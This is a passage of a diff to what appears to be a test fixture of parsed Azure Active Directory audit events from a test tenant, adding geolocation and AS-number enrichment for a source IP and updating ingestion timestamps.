//manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -7670,6 +8150,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -7836,7 +8328,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125066900Z", + "ingested": "2021-12-14T14:48:43.176663984Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -7863,6 +8355,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -8029,7 +8533,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125073500Z", + "ingested": "2021-12-14T14:48:43.176664659Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -8056,6 +8560,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -8222,7 +8738,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125080400Z", + "ingested": "2021-12-14T14:48:43.176665217Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -8249,6 +8765,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -8415,7 +8943,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125087Z", + "ingested": "2021-12-14T14:48:43.176665791Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
